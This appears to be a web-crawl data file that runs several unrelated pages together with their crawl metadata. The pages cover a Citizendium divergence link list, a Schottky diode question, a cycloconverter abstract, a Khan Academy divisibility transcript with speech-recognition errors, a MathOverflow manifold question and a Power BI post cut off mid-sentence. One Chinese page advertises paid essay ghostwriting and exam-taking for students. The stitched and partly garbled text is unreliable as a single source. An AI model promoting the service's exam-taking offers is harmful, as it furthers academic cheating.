{"ft_lang_label":"__label__en","ft_lang_prob":0.92139906,"math_prob":0.94626826,"size":9072,"snap":"2022-05-2022-21","text_gpt3_token_len":2041,"char_repetition_ratio":0.15902074,"word_repetition_ratio":0.09716088,"special_character_ratio":0.23555997,"punctuation_ratio":0.11904762,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9727906,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-25T22:20:13Z\",\"WARC-Record-ID\":\"<urn:uuid:9137485f-28ec-4737-9d82-69bd45f154b2>\",\"Content-Length\":\"54494\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6b0bcf34-be0e-4d4a-b38b-f8aebbb6708f>\",\"WARC-Concurrent-To\":\"<urn:uuid:37dbac3d-985e-4bb2-ac38-45b5761eeca7>\",\"WARC-IP-Address\":\"192.64.113.86\",\"WARC-Target-URI\":\"https://essaywritersexpert.com/assignment-week-3-exercise-course-math-201b2-summmer-2014/\",\"WARC-Payload-Digest\":\"sha1:BCVVPERGZYOS5TTVCUL2NKHDEHYYU4LM\",\"WARC-Block-Digest\":\"sha1:VYLBWOJO45SFIBWATJEGABUTTETXRPVM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662594414.79_warc_CC-MAIN-20220525213545-20220526003545-00697.warc.gz\"}"}
https://en.citizendium.org/wiki/Divergence/Related_Articles
[ "# Divergence/Related Articles", null, "", null, "Main Article Discussion Related Articles  [?] Bibliography  [?] External Links  [?] Citable Version  [?] A list of Citizendium articles, and planned articles, about Divergence.\n\n## Bot-suggested topics\n\nAuto-populated based on Special:WhatLinksHere/Divergence. Needs checking by a human.\n\n• Coulomb's law [r]: An inverse-square distance law, like Newton's gravitational law, describing the forces acting between electric point charges; also valid for the force between magnetic poles. [e]\n• Derivative [r]: The rate of change of a function with respect to its argument. [e]\n• Divergence theorem [r]: A theorem relating the flux of a vector field through a surface to the vector field inside the surface. [e]\n• Electric displacement [r]: a vector field D in a dielectric; D is proportional to the outer electric field E. [e]\n• Electric field [r]: force acting on an electric charge—a vector field. [e]\n• Gauss' law (magnetism) [r]: States that the total magnetic flux through a closed surface is zero; this means that magnetic monopoles do not exist. [e]\n• Helmholtz decomposition [r]: Decomposition of a vector field in a transverse (divergence-free) and a longitudinal (curl-free) component. [e]\n• James Clerk Maxwell [r]: (1831 – 1879) Scottish physicist best known for his formulation of electromagnetic theory and the statistical theory of gases. [e]\n• Magnetic induction [r]: A divergence-free electromagnetic field, denoted B, determining the Lorentz force upon a moving charge, and related to the magnetic field H. [e]\n• Maxwell equations [r]: Mathematical equations describing the interrelationship between electric and magnetic fields; dependence of the fields on electric charge- and current- densities. [e]\n• Spherical polar coordinates [r]: Angular coordinates on a sphere: longitude angle φ, colatitude angle θ [e]\n• Vector field [r]: A vector function on the three-dimensional Euclidean space $\\mathbb {E} ^{3}$", null, ". [e]" ]
[ null, "https://s9.addthis.com/button1-share.gif", null, "https://en.citizendium.org/wiki/images/4/4f/Statusbar2.png", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/759fbb70b744830ed9db0aa3a810647fff3e2614", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85087687,"math_prob":0.9323325,"size":1943,"snap":"2022-05-2022-21","text_gpt3_token_len":446,"char_repetition_ratio":0.15832904,"word_repetition_ratio":0.0,"special_character_ratio":0.22233659,"punctuation_ratio":0.11676647,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99775726,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-17T15:48:19Z\",\"WARC-Record-ID\":\"<urn:uuid:6e162d7b-4586-4555-8493-67d7987f11c6>\",\"Content-Length\":\"40869\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b9a27804-7aea-433c-a558-d7adfb35e6a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:2be2102e-a4d7-46b0-af11-813f805cfa65>\",\"WARC-IP-Address\":\"208.100.31.41\",\"WARC-Target-URI\":\"https://en.citizendium.org/wiki/Divergence/Related_Articles\",\"WARC-Payload-Digest\":\"sha1:OWZIDAYINNVB5CFUGPXUK6Y7BAUVO7QV\",\"WARC-Block-Digest\":\"sha1:V7DADCDRE5CXUPVQRRQXFIURU3AUVMFI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662517485.8_warc_CC-MAIN-20220517130706-20220517160706-00694.warc.gz\"}"}
https://electronics.stackexchange.com/questions/508336/usb-supply-protection-using-shotkey-diode
[ "# USB supply protection using shotkey diode\n\nHere is the atached schematic of the clamping diode condition. Isolated the connection to contoller and kept the end open. When USB input is varied above 5V the expected output is diode cathode voltage (5V) + diode drop, which I was getting when im simulating the same.\n\nTried to test the same condition on board level buy varying the USB input above 5V ,I'm seeing the same USB input voltage at output (diode anode). Please let me know what is the problem in real case.", null, "• what's the problem? This sounds right. – Marcus Müller Jul 1 '20 at 12:08\n• Testing result it not same as simulation. If USB input is 10 V(continuous input), the voltage is at diode anode is 10V, but the actual to be 5v + diode drop. Let us know how to test this. – Rohan Kharvi Jul 1 '20 at 12:38\n• The diode is named after the German physicist Walter H. Schottky. It is also called Schottky (with a capital 'S'). – Transistor Jul 1 '20 at 13:09" ]
[ null, "https://i.stack.imgur.com/7uNQR.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8745922,"math_prob":0.89454174,"size":469,"snap":"2021-31-2021-39","text_gpt3_token_len":113,"char_repetition_ratio":0.14193548,"word_repetition_ratio":0.0,"special_character_ratio":0.21321961,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9532565,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T13:49:40Z\",\"WARC-Record-ID\":\"<urn:uuid:ec657dbd-39d7-4ae4-833a-5203973120ea>\",\"Content-Length\":\"169417\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e1f2d0bb-547a-4d41-84b2-467a2ba35522>\",\"WARC-Concurrent-To\":\"<urn:uuid:1c722df8-bc42-4e8d-aeff-432eef7b8016>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://electronics.stackexchange.com/questions/508336/usb-supply-protection-using-shotkey-diode\",\"WARC-Payload-Digest\":\"sha1:OBMAVSQVY2JUE7GHM3J7JKRCCDXWG4K2\",\"WARC-Block-Digest\":\"sha1:56PFGM5YPULEVAMM2QVFZQR4GVPJUOUP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153729.44_warc_CC-MAIN-20210728123318-20210728153318-00223.warc.gz\"}"}
http://www.actapress.com/Abstract.aspx?paperId=32238
[ "## NOVEL SINGLE-PHASE TO SINGLE-PHASE CYCLOCONVERSION STRATEGIES: MATHEMATICAL AND SIMULATION STUDIES\n\nS. Jeevananthan, P. Dananjayan, and R. Madhavan\n\n### Keywords\n\nCycloconverter, total harmonic distortion, cosine wave crossing method, half wave symmetry variable firing angle method, quarter wave symmetry variable firing angle method\n\n### Abstract\n\nThis paper presents two novel control strategies for single-phase to single-phase cycloconversion. The proposed half wave symmetry variable firing angle method (HWSVFAM) and quarter wave sym- metry variable firing angle method (QWSVFAM) offer enhanced fundamental component at low total harmonic distortion (THD). Complete mathematical relations for input side performance indices (distortion factor, displacement factor and power factor) and output side performance indices (fundamental component and THD) are developed for the analysis of proposed schemes and comparison with the existing strategies. Results of the simulation have been validated with the mathematical equations and the superiority of the proposed schemes is confirmed." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78941745,"math_prob":0.69017416,"size":983,"snap":"2020-24-2020-29","text_gpt3_token_len":195,"char_repetition_ratio":0.1154239,"word_repetition_ratio":0.054263566,"special_character_ratio":0.16276704,"punctuation_ratio":0.1,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9593397,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-29T16:32:16Z\",\"WARC-Record-ID\":\"<urn:uuid:66c57c6d-ac5e-4e0b-a10c-fe6a4993d12b>\",\"Content-Length\":\"19704\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:50294f8b-0d35-4dd2-aa39-4602f44eb01c>\",\"WARC-Concurrent-To\":\"<urn:uuid:fd73e5b3-81a0-425c-87f7-bcede1ae9076>\",\"WARC-IP-Address\":\"162.223.123.100\",\"WARC-Target-URI\":\"http://www.actapress.com/Abstract.aspx?paperId=32238\",\"WARC-Payload-Digest\":\"sha1:MOQSDXLB7NPC7HRLAWHDKU2BV3LOXXPO\",\"WARC-Block-Digest\":\"sha1:ZNSI6IW3SFEKPUUKN2ZBS5FH7GUIQKQN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347405558.19_warc_CC-MAIN-20200529152159-20200529182159-00337.warc.gz\"}"}
https://www.khanacademy.org/math/pre-algebra/pre-algebra-factors-multiples/pre-algebra-divisibility-tests/v/recognizing-divisibility?playlist=Developmental%20Math
[ "If you're seeing this message, it means we're having trouble loading external resources on our website.\n\nIf you're behind a web filter, please make sure that the domains *.kastatic.org and *.kasandbox.org are unblocked.\n\nMain content\n\n# Recognizing divisibility\n\n## Video transcript\n\ndetermine whether 380 is divisible by 2 3 4 5 6 9 or 10 they skipped 7 & 8 so we don't have to worry about those so let's think about 2 so let's think about so are we divisible by 2 let me write the 2 here divisible by 2 well in order for something to be divisible by 2 it has to be an even number and to be an even number your ones digits so let me read that rewrite 380 to be even your ones digit has to be even so then this has to be even and for this to be even it has to be 0 2 4 6 or 8 and this is 0 so 380 is even which means it is divisible by 2 so it works with 2 so 2 works out let's think about the situation 4 3 now a quick way to think about 3 so let me write just 3 question mark is to add the digits of your number and if the sum that you get is divisible by 3 then you are divisible by 3 so let's try to do that so 380 let's add the digits 3 plus 8 plus 0 is equal to 3 plus 8 is 11 plus 0 is so it's just 11 and if you have trouble with figuring out with a dissident like 3 you could then just add these two numbers again so you can actually add the 1 plus 1 again and you would get a 2 regardless of whether you look at the 11 or the 2 neither of these are divisible by 3 so not not divisible visible 5/3 maybe in a future video I'll explain why this works and maybe you want to think about why this works so these aren't divisible by 3 so three hundred eighty so three hundred and eighty is not divisible 380 not not divisible by three so three does not work we are not divisible by three now let's think about the situation let's think about the situation for 4 so if we're thinking about 4 divisibility so let me write it in orange so we are wondering about for now something you may or may not already realize is that 100 is divisible by 4 it goes evenly so this is 380 so the 300 is divisible by 4 so we just have to figure out whether the left over whether the 80 is divisible by 4 another way to think about it is are the last two digits last two digits divisible by 4 and this comes from the fact that 100 is divisible by 4 so everything on the hundreds place were above it's going to be the life or you just have to worry about the last part so in this situation is 80 divisible by 4 now you could I ball that you could say well 8 is definitely divisible by 4 or 80 divided by 8 divided by 4 is 2 80 divided by 4 is 20 so this works yes yes so since 80 is divisible by 4 380 is also divisible by 4 so 4 works for work so let's do 5 make sure you scroll down a little bit let's try 5 so what's the pattern when something is divisible by 5 let's do the multiples of 5 5 10 15 20 25 so if something is divisible by 5 I could keep going so divisible by 5 that means it ends with either a 5 or a 0 right every multiple of 5 either has a 5 or a 0 in the ones place so 5 or 0 in ones place ones place now 380 has a 0 in the ones place so it is divisible by 5 now let's think about the situation for 6 let's think about what happens with 6 so we want to know are we divisible by 6 so to be divisible by 6 you have to be divisible by the things that make up 6 remember 6 is equal to 2 times 3 so if you're divisible by 6 that means you're divisible by - and you are divisible by three if you're divisible by both 2 and 3 you will be divisible by 6 now 380 is divisible by 2 but we've already established that it is not divisible by 3 if it's not divisible by 3 it cannot be divisible by 6 so this gets knocked out we are not divisible by 6 now let's go to 9 let's go to 9 so divisibility by 9 so you can make a similar argument here that if if something is not divisible by 3 there's no way it's going to be divisible by 9 because 9 9 is equal to 3 times 3 so to be divisible by 9 you have to be divisible by it by 3 at least twice at least two threes have to go into your number and this isn't the case so you could already knock nine out but if we didn't already know that we're not divisible by 3 the other way to do it is a very similar way to figure out divisible by divisibility by 3 and we can add the digits so you add 3 + 8 + 0 and you get 11 and you say is this divisible by 9 and you say this is not divisible by 9 so 380 must not be divisible by 9 and for 3 you do the same thing but you test whether the sum is divisible by 3 for 9 you test with a certain is 1 by 9 so last Li we have the number 10 we have the number 10 and this is in some level the easiest one what do all the multiples of 10 look like 10 20 30 40 we could just keep going on and on they all end with zero or if something ends with zero it is divisible by 10 380 is the visit does end with zero or it's once place does have a zero on it so it is divisible by 10 so we're divisible by all of these numbers except for 3 6 & 9" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.97600114,"math_prob":0.9540999,"size":4723,"snap":"2021-04-2021-17","text_gpt3_token_len":1249,"char_repetition_ratio":0.21974994,"word_repetition_ratio":0.04775549,"special_character_ratio":0.27503705,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934728,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-11T04:39:06Z\",\"WARC-Record-ID\":\"<urn:uuid:93e80568-d8fe-472a-8fc0-8916057608d4>\",\"Content-Length\":\"203464\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7ae8c31-b139-4d99-8cbb-1c9e5270d819>\",\"WARC-Concurrent-To\":\"<urn:uuid:7126c931-87a1-4470-95e9-e02dd42657eb>\",\"WARC-IP-Address\":\"151.101.201.42\",\"WARC-Target-URI\":\"https://www.khanacademy.org/math/pre-algebra/pre-algebra-factors-multiples/pre-algebra-divisibility-tests/v/recognizing-divisibility?playlist=Developmental%20Math\",\"WARC-Payload-Digest\":\"sha1:EKCFRNPD5BYWSME42M5GIZIXPY524JWU\",\"WARC-Block-Digest\":\"sha1:GMXRWRDWNNGUKXBDTE326A2LBWRYHDTH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038060927.2_warc_CC-MAIN-20210411030031-20210411060031-00442.warc.gz\"}"}
https://www.statistics-lab.com/%E6%95%B0%E5%AD%A6%E4%BB%A3%E5%86%99%E4%BA%A4%E6%8D%A2%E4%BB%A3%E6%95%B0%E4%BB%A3%E5%86%99commutative-algebra%E4%BB%A3%E8%80%83math3303/
[ "### 数学代写|交换代数代写commutative algebra代考|MATH3303", null, "statistics-lab™ 为您的留学生涯保驾护航 在代写交换代数commutative algebra方面已经树立了自己的口碑, 保证靠谱, 高质且原创的统计Statistics代写服务。我们的专家在代写交换代数commutative algebra代写方面经验极为丰富,各种代写交换代数commutative algebra相关的作业也就用不着说。\n\n• Statistical Inference 统计推断\n• Statistical Computing 统计计算\n• (Generalized) Linear Models 广义线性模型\n• Statistical Machine Learning 统计机器学习\n• Longitudinal Data Analysis 纵向数据分析\n• Foundations of Data Science 数据科学基础\n\n## 数学代写|交换代数代写commutative algebra代考|Commutative rings and ideals\n\nThe most fundamental object of this book is a commutative ring having a multiplicative identity element. Throughout the text, one refers to it simply as a ring.\n\nA ring homomorphism (or simply, a homomorphism) is a map $\\varphi: R \\rightarrow S$ between rings, which besides being compatible with the two operations, is also required to map the multiplicative identity element of $R$ to the one of $S$. If no confusion arises, one usually denotes the multiplicative identity of any ring by 1 , even if there is more than one ring involved in the discussion. A ring homomorphism $R \\rightarrow S$ that admits an inverse ring homomorphism $S \\rightarrow R$ is called an isomorphism. As is easily seen, any bijective homomorphism is an isomorphism.\n\nThe kernel of $\\varphi$ is the set $\\operatorname{ker} \\varphi:={a \\in R \\mid \\varphi(a)=0}$. It is easy to see that $\\operatorname{ker} \\varphi$ is an ideal of $R$ and induces an injective homomorphism $R / \\operatorname{ker} \\varphi \\hookrightarrow S$. Because of Proposition 1.1.2 below, one often moves over to the subring $R / \\operatorname{ker} \\varphi$ for the sake of an argument.\n\nGiven an arbitrary homomorphism $\\varphi: R \\rightarrow S$, one can move back and forth between ideals of $S$ and of $R$ : given an ideal $J \\subset S$, the inverse image $\\varphi^{-1}(J) \\subset R$ is an ideal of $R$, while given an ideal $I \\subset R$ one obtain the ideal of $S$ generated by the set $\\varphi(I)$. The first such move is called a contraction-a terminology that rigorously makes better sense when $R \\subset S$; in the second move, the ideal generated by $\\varphi(I)$ is called the extended ideal of $I$.\n\nA subgroup of the additive group of a ring $R$ is called a subring provided it is closed under the product operation of $R$ and contains the multiplicative identity of $R$.\n\nAn element $a \\in R$ is said to be a zero-divisor if there exists $b \\in R, b \\neq 0$, such that $a b=0$; otherwise, $a$ is called a nonzero divisor. In this book, a nonzero divisor will often be referred to as a regular element. A sort of extreme case of a zero-divisor is a nilpotent element $a$, such that $a^{n}=0$ for some $n \\geq 1$.\n\nOne assumes a certain familiarity with these notions and their elementary manipulation.\n\nA terminology that will appear very soon is that of an $R$-algebra to designate a ring $S$ with a homomorphism $R \\rightarrow S$.\n\n## 数学代写|交换代数代写commutative algebra代考|Sum of ideals\n\nThe set theoretic union of two ideals $I, J \\subset R$ is not an ideal, unless one of them is contained in the other. So, one takes the ideal generated by $I \\cup J$-this is called the ideal sum of the two ideals and is denoted by $I+J$ or $(I, J)$. The second notation was largely favored in parts of the classical literature and is the one to be employed in this book. On the other hand, the first notation and the terminology are largely justified by the fact that a typical element of $I+J$ has the form $a+a^{\\prime}$, with $a \\in I$ and $a^{\\prime} \\in J$, thus sharing the goodies of the notion of summing two subgroups of an additively written Abelian group or two subspaces of a vector space. In particular, an arbitrary expression $a+a^{\\prime}$ uniquely determines its summands if and only if $I \\cap J={0}$. In the case of Abelian groups or vector spaces, this condition implies direct sum $I \\oplus J$. However, the burden carried by the ring multiplication and by the ideal theoretic main property cause the null intersection to be a somewhat rare phenomenon since it requires lots of zero-divisors in the ring.\n\nIn contrast to the case of ideal intersection, the ideal sum is easily obtained in terms of generators, namely, if $I=(S)$ and $J=\\left(S^{\\prime}\\right)$ then $(I, J)=\\left(S \\cup S^{\\prime}\\right)$. Note that, since $S \\cap S^{\\prime} \\subset S \\cup S^{\\prime}$, there is quite a bit of superfluous generators in the union. The ideal sum notion applies ipsis literis to an arbitrary family of ideals and appears quite often in the argument of a general proof and is a useful construction as such.\n\n## 数学代写|交换代数代写commutative algebra代考|Product of ideals\n\nGiven ideals $I, J \\subset R$, the set ${a b \\mid a \\in I, b \\in J}$ of products is not an ideal either (unless at least one of them is principal). The ideal generated by this set is called the ideal product and is denoted by IJ. Here, the generators question is rather trivial for if $I=(S)$ and $J=\\left(S^{\\prime}\\right)$ then the ideal product $I J$ is generated by the set $\\left{s s^{\\prime} \\mid s \\in S, s^{\\prime} \\in S^{\\prime}\\right}$.\nNote the relation of the product to the intersection: as $I J$ is contained both in $I R$ and in $J R$, it follows that $I J \\subset I \\cap J$. Thus, a measure of obstruction as to when $I \\cap J={0}$ holds is that $I J={0}$, which says that every element of one ideal is zero-divided by every element of the second ideal, a rather severe condition. At the other end of the spectrum, the equality $I J=I \\cap J$ seldom takes place, turning out to be rather a difficult condition of “transversality.”\n\nThe ideal product extends easily to a finite family of ideals. A special nevertheless exceedingly important case is that of a constant family $\\left{I_{i}\\right}_{i=1}^{m}, I_{i}=I(1 \\leq i \\leq m)$. In this case, the ideal product is called the $m$ th power of the ideal $I$ and is naturally denoted by $I^{m}$. Note that if $I=\\left(s_{1}, \\ldots, s_{n}\\right)$ then $I^{m}$ is generated by the “monomials” of “degree” $m$ in $s_{1}, \\ldots, s_{n}$. The question as to how many of these monomial-like generators are actually superfluous turns out to be a rather deep question related to the notion of analytic independence of ideal generators-a tall order in modern commutative algebra.Besides, the chain $R=I^{0} \\supset I=I^{1} \\supset I^{2} \\supset \\cdots$ plus the multiplication rule $I^{m} I^{n}=I^{m+n}$ give rise to deep considerations in both commutative algebra and algebraic geometry. The two topics are in fact quite intertwined.\n\n## 有限元方法代写\n\ntatistics-lab作为专业的留学生服务机构,多年来已为美国、英国、加拿大、澳洲等留学热门地的学生提供专业的学术服务,包括但不限于Essay代写,Assignment代写,Dissertation代写,Report代写,小组作业代写,Proposal代写,Paper代写,Presentation代写,计算机作业代写,论文修改和润色,网课代做,exam代考等等。写作范围涵盖高中,本科,研究生等海外留学全阶段,辐射金融,经济学,会计学,审计学,管理学等全球99%专业科目。写作团队既有专业英语母语作者,也有海外名校硕博留学生,每位写作老师都拥有过硬的语言能力,专业的学科背景和学术写作经验。我们承诺100%原创,100%专业,100%准时,100%满意。\n\n## MATLAB代写\n\nMATLAB 是一种用于技术计算的高性能语言。它将计算、可视化和编程集成在一个易于使用的环境中,其中问题和解决方案以熟悉的数学符号表示。典型用途包括:数学和计算算法开发建模、仿真和原型制作数据分析、探索和可视化科学和工程图形应用程序开发,包括图形用户界面构建MATLAB 是一个交互式系统,其基本数据元素是一个不需要维度的数组。这使您可以解决许多技术计算问题,尤其是那些具有矩阵和向量公式的问题,而只需用 C 或 Fortran 等标量非交互式语言编写程序所需的时间的一小部分。MATLAB 名称代表矩阵实验室。MATLAB 最初的编写目的是提供对由 LINPACK 和 EISPACK 项目开发的矩阵软件的轻松访问,这两个项目共同代表了矩阵计算软件的最新技术。MATLAB 经过多年的发展,得到了许多用户的投入。在大学环境中,它是数学、工程和科学入门和高级课程的标准教学工具。在工业领域,MATLAB 是高效研究、开发和分析的首选工具。MATLAB 具有一系列称为工具箱的特定于应用程序的解决方案。对于大多数 MATLAB 用户来说非常重要,工具箱允许您学习应用专业技术。工具箱是 MATLAB 函数(M 文件)的综合集合,可扩展 MATLAB 环境以解决特定类别的问题。可用工具箱的领域包括信号处理、控制系统、神经网络、模糊逻辑、小波、仿真等。" ]
[ null, "https://www.statistics-lab.com/wp-content/uploads/2022/06/image-544.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.50009006,"math_prob":0.9966381,"size":10799,"snap":"2022-40-2023-06","text_gpt3_token_len":5928,"char_repetition_ratio":0.10819824,"word_repetition_ratio":0.010842369,"special_character_ratio":0.21761274,"punctuation_ratio":0.0831928,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99964166,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-30T12:17:16Z\",\"WARC-Record-ID\":\"<urn:uuid:ae46791d-fe61-4381-ae3c-5804c2b57ba7>\",\"Content-Length\":\"155713\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e0aa3768-9060-46fd-b31e-ffa707d5f861>\",\"WARC-Concurrent-To\":\"<urn:uuid:b43f3acc-7a1d-4cfd-aab4-d694e150b8d1>\",\"WARC-IP-Address\":\"172.67.148.182\",\"WARC-Target-URI\":\"https://www.statistics-lab.com/%E6%95%B0%E5%AD%A6%E4%BB%A3%E5%86%99%E4%BA%A4%E6%8D%A2%E4%BB%A3%E6%95%B0%E4%BB%A3%E5%86%99commutative-algebra%E4%BB%A3%E8%80%83math3303/\",\"WARC-Payload-Digest\":\"sha1:STXEVBR2WBWDMGCAFT3V3TZ6G5F4JA4D\",\"WARC-Block-Digest\":\"sha1:42MTV5LMHYD73LBVEHNNYCVO4Y3KVHDE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499816.79_warc_CC-MAIN-20230130101912-20230130131912-00306.warc.gz\"}"}
https://mathoverflow.net/questions/343199/the-infty-category-of-n-manifolds-and-open-embeddings-determined-homotopica
[ "# The $\\infty$-category of $n$-manifolds and open embeddings determined homotopically from that of topological manifolds?\n\nLet $$\\mathrm{Diff}_n$$, $$\\mathrm{PL}_n$$, $$\\mathrm{Top}_n$$ denote the $$\\infty$$-categories of $$n$$-manifolds which are respectively smooth/PL/topological, and open embeddings (for instance by taking the homotopy coherent nerve of the sing of the corresponding topological categories).\n\nLet $$\\operatorname{BTop}(n)$$ and $$\\mathrm{B}O(n)$$ be the classifying spaces of topological respectively orthogonal $$\\mathbb{R}^n$$-bundles. Similarly let $$\\operatorname{BPL}(n)$$ denote the classifying space of $$\\mathrm{PL}$$-bundles of rank $$n$$ (it's not quite the classifying space of a topological group but is actually the simplicial set classifying $$\\mathrm{PL}$$ bundles over polyhedra). Let $$\\mathcal{S}_{/X}$$ denote the slice category of the $$\\infty$$-category of spaces over a fixed space $$X$$. There's a canonical commutative diagram of $$\\infty$$-categories (for the middle row in this diagram you have to work a bit but I'm pretty sure this is true): $$\\require{AMScd}$$\n\n$$\\begin{CD} \\mathrm{Diff}_n @>>> \\mathrm{PL}_n @>>> \\mathrm{Top}_n\\\\ @VVV @VVV @VVV \\\\ \\mathcal{S}_{/\\mathrm{B}O(n)} @>>> S_{ /\\mathrm{B}\\mathrm{PL}(n)} @>>> \\mathcal{S}_{/\\mathrm{BTop}(n)} \\end{CD}$$\n\nQuestion: (for $$n \\ne 4$$) Are all the squares in this diagram pullback squares? If so where can I find this or at least the relevant pieces of the argument?\n\n• I think you need to replace BO, BPL and BTop by their unstable versions. Then it sounds like a reformulation of smoothing theory as in Kirby-Siebenmann (which would even work for dimension 4 when going from PL to Diff). – skupers Oct 5 at 16:09\n• @skupers Having the stable versions is part of the statement which I think shiuld be true due to Product Structure theorems. Could you perhaps point at the exact statements from Kirby and Siebenmann you have in mind? – Saal Hardali Oct 5 at 16:17\n• The product structure theorems give $n$-equivalences, but here you ask for full homotopy equivalences. It is true that $Top(n)/PL(n)=Top/PL=K(\\mathbb Z/2,3)$, though, so that square is OK either way. Unstable PL bundles realize all Pontrjagin classes, while smooth ones don't. So there is a PL $S^3$ bundle on $S^{4n}$ with nontrivial $p_n$ that is not smoothable, but which your stable statement would imply smoothable. . . Also, $Top(n)$ probably isn't a topological group, either, and you should do something simplicial there, too. – Ben Wieland Oct 5 at 16:45\n• By Kisters theorem, BTop(n) defined as classifying n-dimensional topological microbundles is weakly equivalent to BHomeo(R^n). Anyway, it's Essay V.1 you want to look at. Another reference is Lashof's Embedding Spaxes – skupers Oct 5 at 17:52\n• Remark 3.29 of the paper arxiv.org/abs/1206.5522 claims that the answer is yes, and that this follows from Kirby-Siebenmann, but there is no precise reference. I was not able to find it in KS, but if you manage I would be quite interested to see it myself. – Yonatan Harpaz Oct 16 at 19:33" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67847836,"math_prob":0.99651515,"size":1309,"snap":"2019-43-2019-47","text_gpt3_token_len":382,"char_repetition_ratio":0.14099617,"word_repetition_ratio":0.0,"special_character_ratio":0.27807486,"punctuation_ratio":0.04845815,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99958175,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-13T04:46:26Z\",\"WARC-Record-ID\":\"<urn:uuid:22f66986-94b5-4968-9289-88a437ac8680>\",\"Content-Length\":\"114913\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ca2b292e-8570-4db5-a0c2-0620e8233f01>\",\"WARC-Concurrent-To\":\"<urn:uuid:e837c049-9ace-4829-9c51-aa5a4b3a9b84>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/343199/the-infty-category-of-n-manifolds-and-open-embeddings-determined-homotopica\",\"WARC-Payload-Digest\":\"sha1:WZIR2O2GKHF5MXNHS7WEILUG6HGE3VGL\",\"WARC-Block-Digest\":\"sha1:EGRSHYFO4L5HJN3VREP7VSSBCWHCXS3H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496665985.40_warc_CC-MAIN-20191113035916-20191113063916-00552.warc.gz\"}"}
https://powerbi.microsoft.com/tr-tr/blog/visualizing-and-interacting-with-your-azure-machine-learning-studio-experiments/
[ "# Visualizing and interacting with your Azure Machine Learning Studio experiments", null, "Microsoft Senior Program Manager Christian Berg is back with another entry in his series on becoming your organization's strategic advisor with Machine Learning and Power BI. If you need to catch up, you can find the five previous chapters summarized here on the blog.\n\n—————————————————————-\n\nVisualizing and exploring the results of your Azure Machine Learning Studio (ML Studio) experiments is useful both when developing and evaluating the model but most importantly when deploying your model and presenting the results. With Power BI Desktop this can be done in two ways, either by writing the results from the model to a database that you then connect Power BI to, or by using an R script visual (Rviz). Using an Rviz has the advantage that you can dynamically select the subset of the Power BI model that you want to score. This enables powerful What-If Analysis scenarios where you can use R and ML Studio to assess the distribution of likely outcomes based on the counterfactuals.\n\nIn this example we will look at connecting to an Azure ML Studio experiment with an Rviz and then building on that to create a dynamic report to explore cross price elasticities. We will also look at a simpler example where we instead use DAX to explore the impact of different discount percentages, based on an assumption about our elasticity.\n\nFor the example report we have an ensemble regression model that was built in ML Studio to predict revenue by store, product and month using historic data, marketing 